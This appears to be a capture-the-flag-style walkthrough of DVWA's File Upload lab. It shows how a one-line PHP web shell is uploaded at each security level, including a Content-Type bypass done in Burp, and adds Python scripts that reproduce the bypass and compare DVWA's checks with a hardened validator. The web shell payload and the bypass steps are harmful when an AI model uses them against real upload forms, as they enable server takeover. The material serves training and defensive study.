1、File Upload: the test page
2、Upload at security=low
(1) Upload a PHP one-line web shell directly. Nothing is filtered, so the upload succeeds; the response shows the stored path, which is what China Chopper (菜刀) connects to.
(2) Connect with China Chopper; webshell obtained.
3、Upload at security=medium
(1) Uploading a .php file directly fails.
(2) Uploading an image file succeeds.
(3) Capture both requests with Burp Suite and compare them in Comparer; the difference that matters is the Content-Type header of the file part.
(4) Upload the PHP shell again, this time changing the file part's Content-Type to image/jpeg in Burp; the upload succeeds.
(5) Connect with China Chopper; webshell obtained.
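As an added example (not part of the original writeup, and not DVWA's code), the following Python reproduces the Medium-level bypass offline: it builds the multipart body the upload form sends, rewrites the file part's Content-Type to image/jpeg exactly as was done in Burp, then parses the body the way PHP fills $_FILES and applies the Medium check from the DVWA source analysed further down. The field name uploaded matches DVWA's form; the boundary string, the filename shell.php and the one-line shell are constructed for this example.

```python
import re

# Constructed for this example: DVWA's form field is named "uploaded"; the
# payload is a one-line PHP shell of the kind the walkthrough uploads.
FIELD = "uploaded"
WEBSHELL = b"<?php @eval($_POST['cmd']); ?>\n"
BOUNDARY = "----WebKitFormBoundaryExample1234"   # fixed so runs are repeatable


def build_upload_body(filename: str, content_type: str, payload: bytes,
                      boundary: str = BOUNDARY) -> bytes:
    """Build the multipart/form-data body DVWA's upload form sends.

    content_type is whatever the client claims for the file part. A browser
    derives it from the extension (application/octet-stream for .php); this
    is the one header that was rewritten to image/jpeg in Burp.
    """
    lines = [
        f"--{boundary}".encode(),
        f'Content-Disposition: form-data; name="{FIELD}"; filename="{filename}"'.encode(),
        f"Content-Type: {content_type}".encode(),
        b"",
        payload,
        f"--{boundary}".encode(),
        b'Content-Disposition: form-data; name="Upload"',
        b"",
        b"Upload",
        f"--{boundary}--".encode(),
        b"",
    ]
    return b"\r\n".join(lines)


def php_files_entry(body: bytes, boundary: str = BOUNDARY) -> dict:
    """Return what PHP would put in $_FILES['uploaded'] for this body.

    'name' and 'type' are copied from the client's own headers; only 'size'
    is measured by the server. Nothing here inspects the file bytes.
    """
    delim = f"--{boundary}".encode()
    for part in body.split(delim)[1:-1]:
        part = part[2:-2]                      # strip the CRLFs around the part
        raw_headers, _, content = part.partition(b"\r\n\r\n")
        headers = raw_headers.decode("latin-1")
        disp = re.search(r'name="([^"]*)"(?:; filename="([^"]*)")?', headers)
        if not disp or disp.group(1) != FIELD or disp.group(2) is None:
            continue                           # not the file part
        ctype = re.search(r"^Content-Type:\s*(.+)$", headers, re.M)
        return {
            "name": disp.group(2),
            "type": ctype.group(1).strip() if ctype else "",
            "size": len(content),
        }
    raise ValueError("no file part named %r in body" % FIELD)


def dvwa_medium_accepts(f: dict) -> bool:
    """The Medium-level condition from the DVWA source, transcribed."""
    return f["type"] == "image/jpeg" and f["size"] < 100000


if __name__ == "__main__":
    # The request a browser sends for shell.php, and the same request after
    # the single Content-Type edit made in Burp.
    for label, ctype in (("browser", "application/octet-stream"),
                         ("burp-edited", "image/jpeg")):
        entry = php_files_entry(build_upload_body("shell.php", ctype, WEBSHELL))
        verdict = "accepted" if dvwa_medium_accepts(entry) else "rejected"
        print(f"{label:12} {entry} -> {verdict}")
```

The point the script makes concrete is that $_FILES['uploaded']['type'] is nothing more than the Content-Type line the client wrote into the multipart part, so a check on it constrains the attacker's request, not the attacker's file.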
Source code analysis:
1、Low File Upload Source
<?php
if (isset($_POST['Upload'])) {
    $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
    $target_path = $target_path . basename( $_FILES['uploaded']['name']);

    // No check of any kind: the client-supplied name and contents go straight to disk.
    if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
        echo '<pre>';
        echo 'Your image was not uploaded.';
        echo '</pre>';
    } else {
        echo '<pre>';
        echo $target_path . ' succesfully uploaded!';
        echo '</pre>';
    }
}
?>
2、Medium File Upload Source
<?php
if (isset($_POST['Upload'])) {
    $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
    $target_path = $target_path . basename($_FILES['uploaded']['name']);
    $uploaded_name = $_FILES['uploaded']['name'];
    $uploaded_type = $_FILES['uploaded']['type'];   // the Content-Type the client sent for the part
    $uploaded_size = $_FILES['uploaded']['size'];

    if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)){
        if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
            echo '<pre>';
            echo 'Your image was not uploaded.';
            echo '</pre>';
        } else {
            echo '<pre>';
            echo $target_path . ' succesfully uploaded!';
            echo '</pre>';
        }
    }
    else{
        echo '<pre>Your image was not uploaded.</pre>';
    }
}
?>
3、High File Upload Source
<?php
if (isset($_POST['Upload'])) {
    $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
    $target_path = $target_path . basename($_FILES['uploaded']['name']);
    $uploaded_name = $_FILES['uploaded']['name'];
    $uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);   // text after the last '.'
    $uploaded_size = $_FILES['uploaded']['size'];

    if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){
        if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
            echo '<pre>';
            echo 'Your image was not uploaded.';
            echo '</pre>';
        } else {
            echo '<pre>';
            echo $target_path . ' succesfully uploaded!';
            echo '</pre>';
        }
    }
    else{
        echo '<pre>';
        echo 'Your image was not uploaded.';
        echo '</pre>';
    }
}
?>
Comparing the three levels:
The Low-level code does almost nothing with the uploaded file: any type and any size is accepted, and it is stored in hackable/uploads/ under the name the client supplied.
The Medium-level code checks the type, which must be image/jpeg, and caps the size below 100000 bytes, which does stop a large shell from being uploaded directly. But $_FILES['uploaded']['type'] is simply the Content-Type the client sent for that multipart part, so the check is bypassed by editing the request, as done above.
The High-level code takes the extension after the last '.' and only stores the file when it is exactly jpg, JPG, jpeg or JPEG and the size is under 100000. Mixed-case spellings such as Jpg, jPg or JPeg fail as well, because the comparison is case-sensitive. This is whitelist filtering and is clearly stronger than the Medium check. Two things it still does not do are worth noting: it never looks at the file contents, and it still writes the file under the client's own name, so a PHP payload renamed to .jpg is accepted and sits on disk; it will not run as PHP on its own, only if something else on the server includes or executes it.
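As an added example (not DVWA's code, and not part of the original writeup), the following Python transcribes the High-level extension check and runs it beside a stricter check suggested here, over constructed uploads: a one-line PHP shell under several names and a stub that begins like a JPEG. The stricter check normalises the extension before whitelisting, requires the bytes to start with the JPEG marker, and picks the stored filename on the server. All filenames and byte strings below are constructed for the example; hardened_accepts is this page's suggestion, not a DVWA level.

```python
import os
import secrets

# Constructed inputs: a one-line PHP shell and the first bytes of a JPEG
# (SOI marker plus an APP0 stub), enough to stand in for a real photo here.
WEBSHELL = b"<?php @eval($_POST['cmd']); ?>\n"
JPEG_MAGIC = b"\xff\xd8\xff"
SAMPLE_JPEG = JPEG_MAGIC + b"\xe0\x00\x10JFIF\x00" + b"\x00" * 64


def dvwa_high_accepts(name: str, size: int) -> bool:
    """The High-level condition from the DVWA source, transcribed.

    Only the text after the last '.' is compared, case-sensitively, against
    four spellings; the bytes of the file are never looked at.
    (PHP's strrpos() returns false when there is no '.', and false + 1 is 1,
    so a dotless name yields substr($name, 1); reproduced here for fidelity.)
    """
    pos = name.rfind(".")
    ext = name[pos + 1:] if pos >= 0 else name[1:]
    return ext in ("jpg", "JPG", "jpeg", "JPEG") and size < 100000


def hardened_accepts(name: str, data: bytes, max_size: int = 100000):
    """A stricter check suggested here (not a DVWA level).

    Normalise the extension before whitelisting, require the bytes to start
    like a JPEG, and choose the stored filename on the server so the client's
    name never reaches the filesystem. Returns (accepted, stored_name).
    """
    ext = os.path.splitext(name)[1].lower()
    if ext not in (".jpg", ".jpeg"):
        return False, None
    if len(data) >= max_size or not data.startswith(JPEG_MAGIC):
        return False, None
    return True, secrets.token_hex(16) + ".jpg"


def compare(name: str, data: bytes) -> dict:
    """Run both checks on one upload and report the verdicts side by side."""
    ok, stored = hardened_accepts(name, data)
    return {"name": name,
            "dvwa_high": dvwa_high_accepts(name, len(data)),
            "hardened": ok,
            "stored_as": stored}


if __name__ == "__main__":
    cases = [
        ("shell.php", WEBSHELL),        # rejected by both
        ("shell.Jpg", WEBSHELL),        # mixed case: High rejects, as the text says
        ("shell.jpg", WEBSHELL),        # High accepts a PHP payload with a .jpg name
        ("shell.php.jpg", WEBSHELL),    # only the last extension is checked
        ("photo.JPEG", SAMPLE_JPEG),    # a genuine image passes both
    ]
    for name, data in cases:
        print(compare(name, data))
```

A leading JPEG header is a bar, not a proof: a file can begin with valid JPEG bytes and still carry PHP further in, so the server-chosen name and an upload directory the web server will not execute from are what actually prevent execution; the content check mainly keeps junk out.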